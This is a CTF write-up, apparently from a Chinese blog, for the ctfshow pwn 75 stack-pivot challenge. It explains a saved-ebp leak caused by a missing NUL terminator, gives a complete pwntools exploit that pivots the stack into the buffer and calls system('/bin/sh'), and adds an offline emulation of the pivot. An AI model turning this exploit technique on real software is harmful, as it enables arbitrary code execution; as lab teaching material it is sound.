For background on stack pivoting, read this first: 栈迁移:CTFPwn中的技术揭秘与实战应用 (CSDN blog; "Stack pivoting: the technique explained and applied in CTF pwn")
ctfshow pwn intro 75
Stack pivoting: leaking an address
Challenge
int ctfshow()
{
    char s[36]; // [esp+0h] [ebp-28h] BYREF
    memset(s, 0, 0x20u);
    read(0, s, 0x30u);
    printf("Welcome, %s\n", s);
    puts("What do you want to do?");
    read(0, s, 0x30u);
    return printf("Nothing here ,%s\n", s);
}
NX is on, and each read() takes 0x30 bytes into a buffer that sits at ebp-0x28: that is only 8 bytes past the buffer, enough to overwrite the saved ebp and the return address but not enough for a ROP chain in place. So we pivot the stack into the buffer itself.
The leak is not a format-string bug (the format is a constant); it is a missing NUL terminator. memset() only clears 0x20 bytes while read() accepts 0x30, so if we send exactly 0x28 non-NUL bytes, "%s" keeps printing past the buffer and dumps the saved ebp.
Because "%s" consumes a single argument and prints until it hits a NUL, there is no format-string offset to work out: the 4 bytes right after our input are the saved ebp.
The leaked value is the caller's saved ebp, and the start of s is 0x38 below it (s = ebp_addr - 0x38), which is where the pivot lands. The string "/bin/sh" at s + 0x10 is therefore at ebp_addr - 0x28.
Exploit for this simple stack-pivot challenge:
from pwn import *
context(arch='i386', os='linux', log_level='debug')
p = process('./pwn')
elf = ELF('./pwn')

# Stage 1: leak the saved ebp. Exactly 0x28 bytes and no NUL, so "%s" runs
# straight into the saved ebp; 'b' is a marker to recv up to.
payload = b'a' * 0x27 + b'b'
p.send(payload)  # never sendline here: the '\n' would be byte 0x29 and clobber the low byte of the saved ebp
p.recvuntil(b'b')
ebp_addr = u32(p.recv(4))
print(hex(ebp_addr))
gdb.attach(p)  # optional: confirm that s == ebp_addr - 0x38 in the debugger
pause()

# Stage 2: fake frame inside s (s = ebp_addr - 0x38), then the two overwritten slots.
leave = 0x80484d5           # leave ; ret gadget
system = elf.plt['system']
payload = b'aaaa'                  # s+0x00: popped into ebp by the gadget's leave
payload += p32(system)             # s+0x04: the gadget's ret jumps here
payload += p32(0)                  # s+0x08: fake return address for system
payload += p32(ebp_addr - 0x28)    # s+0x0c: system's argument -> "/bin/sh" at s+0x10
payload += b'/bin/sh\x00'          # s+0x10
payload = payload.ljust(0x28, b'a')   # pad up to the saved ebp slot
payload += p32(ebp_addr - 0x38)       # saved ebp -> s
payload += p32(leave)                 # return address -> leave ; ret
p.sendline(payload)  # exactly 0x30 bytes are read; the trailing '\n' is left over for the shell
p.interactive()
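To check the frame layout without touching the binary, here is an added example (not the original post's exploit) that builds the same two payloads without pwntools and emulates the two i386 `leave; ret` sequences over the fake frame, reporting what system() sees on the stack. The leave;ret gadget 0x80484d5 and the 0x38 distance between the leaked ebp and s come from the post; the leaked ebp value 0xffffd0a8, the system@plt address 0x8048400 and the "Welcome" output are constructed for the demo.

```python
"""Offline check of the ctfshow pwn 75 stack pivot (added example, not the post's code).
Builds the leak and pivot payloads and steps through ctfshow's epilogue plus the
leave;ret gadget over a memory image holding the payload at s."""
import struct

BUF_TO_SAVED_EBP = 0x28      # s lives at ebp-0x28 inside ctfshow()
READ_LEN = 0x30              # read(0, s, 0x30): buffer + saved ebp + return address
BUF_BELOW_LEAKED_EBP = 0x38  # leaked value is the caller's ebp; s = leaked - 0x38 (from the post)


def p32(x):
    return struct.pack('<I', x & 0xffffffff)


def u32(b):
    return struct.unpack('<I', b)[0]


def leak_payload():
    """Exactly 0x28 non-NUL bytes: nothing terminates the string before the saved
    ebp, so printf("%s") prints it. A trailing newline would be byte 0x29 and
    overwrite the low byte of the saved ebp, which is why the post uses send()."""
    return b'a' * 0x27 + b'b'


def parse_leak(output):
    """Recover the saved ebp: the 4 bytes right after the 'b' marker."""
    pos = output.index(b'b') + 1
    return u32(output[pos:pos + 4])


def pivot_payload(leaked_ebp, system_plt, leave_ret):
    """Fake frame laid out inside s, followed by the two overwritten slots."""
    s = leaked_ebp - BUF_BELOW_LEAKED_EBP
    frame = b'aaaa'                  # s+0x00: popped into ebp by the gadget's leave
    frame += p32(system_plt)         # s+0x04: the gadget's ret jumps here
    frame += p32(0)                  # s+0x08: fake return address for system
    frame += p32(s + 0x10)           # s+0x0c: system's argument -> "/bin/sh"
    frame += b'/bin/sh\x00'          # s+0x10
    frame = frame.ljust(BUF_TO_SAVED_EBP, b'a')
    payload = frame + p32(s) + p32(leave_ret)   # saved ebp -> s, return address -> leave;ret
    assert len(payload) == READ_LEN
    return payload


def emulate(payload, leaked_ebp, leave_ret):
    """Run `leave; ret` twice (ctfshow epilogue, then the gadget) over the payload
    placed at s and return the register/stack state at the entry of system()."""
    s = leaked_ebp - BUF_BELOW_LEAKED_EBP
    mem = bytearray(payload)

    def rd(addr):
        off = addr - s
        if not 0 <= off <= len(mem) - 4:
            raise ValueError('read outside the fake frame: %#x' % addr)
        return u32(mem[off:off + 4])

    ebp = s + BUF_TO_SAVED_EBP   # ctfshow's real frame pointer
    # ctfshow: leave ; ret
    esp = ebp
    ebp = rd(esp)                # overwritten saved ebp -> s
    esp += 4
    eip = rd(esp)                # overwritten return address
    esp += 4
    if eip != leave_ret:
        raise AssertionError('return address was not redirected to leave;ret')
    # gadget: leave ; ret  (mov esp, ebp moves the stack into our buffer)
    esp = ebp
    ebp = rd(esp)                # 'aaaa'
    esp += 4
    eip = rd(esp)                # system@plt
    esp += 4
    ret_addr, arg_ptr = rd(esp), rd(esp + 4)   # what system() finds on its stack
    arg = bytes(mem[arg_ptr - s:]).split(b'\x00', 1)[0]
    return {'eip': eip, 'ebp': ebp, 'ret_addr': ret_addr, 'arg_ptr': arg_ptr, 'arg': arg}


if __name__ == '__main__':
    LEAKED_EBP, SYSTEM_PLT, LEAVE_RET = 0xffffd0a8, 0x8048400, 0x80484d5  # constructed values
    banner = b'Welcome, ' + leak_payload() + p32(LEAKED_EBP) + b'\n'      # constructed program output
    ebp_addr = parse_leak(banner)
    state = emulate(pivot_payload(ebp_addr, SYSTEM_PLT, LEAVE_RET), ebp_addr, LEAVE_RET)
    print('leaked ebp %#x, system entered at %#x with arg %r' % (ebp_addr, state['eip'], state['arg']))
```

The emulation makes the two-step pivot explicit: the first `leave` loads our fake ebp (s), the first `ret` goes to the gadget, the second `leave` moves esp into the buffer, and the second `ret` pops system@plt, leaving the fake return address and the "/bin/sh" pointer exactly where system() expects them. If the 0x38 offset were wrong for a different build, the argument pointer would miss the string, which is what gdb.attach in the exploit is there to confirm.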
From: https://blog.csdn.net/2401_87427870/article/details/145223019